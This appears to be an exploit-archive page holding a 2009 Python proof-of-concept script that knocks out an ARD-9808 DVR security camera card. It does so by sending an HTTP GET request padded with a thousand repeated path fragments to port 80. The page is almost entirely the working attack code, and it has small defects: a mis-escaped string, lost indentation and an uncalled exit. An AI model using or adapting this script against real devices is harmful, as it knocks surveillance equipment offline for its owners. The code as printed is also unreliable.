[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ARD-9808 DVR Card Security Camera (GET Request) Remote DoS Exploit
# Published : 2009-07-01
# Author : Stack
# Previous Title : Apple Safari 4.x JavaScript Reload Remote Crash Exploit
# Next Title : PEamp 1.02b (.M3U File) Local Buffer Overflow PoC
import socket
import sys
print "----------------------------------------------------------------"
print " ARD-9808 DVR Card Security Camera <= Remote Denial Of Service "
print " author: Stack "
print "----------------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
buff = "//.\" * 1000
request = "GET " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
raw_input('nnExploit completed. Press "Enter" to quit...')
sys.exit
except:
raw_input('nnUnable to connect. Press "Enter" to quit...')
# www.Syue.com [2009-07-01]